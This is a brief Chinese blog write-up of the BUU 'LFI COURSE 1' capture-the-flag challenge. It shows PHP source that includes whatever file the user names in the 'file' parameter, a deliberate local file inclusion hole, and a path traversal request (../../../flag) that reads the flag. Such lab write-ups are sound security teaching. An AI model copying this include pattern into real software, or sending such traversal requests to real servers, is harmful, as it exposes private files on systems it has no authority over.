BUU LFI COURSE 1

hint 在标题了。

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/7/9
 * Time: 7:07 AM
 */

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

尝试 /?file=flag，not found。

猜测在根目录，尝试 /?file=../../../flag，得到 flag。

posted @ 2024-11-09 18:24 Maplisky 阅读(18) 评论(0) 编辑收藏举报

刷新页面返回顶部

Maplisky

BUU LFI COURSE 1

BUU LFI COURSE 1

公告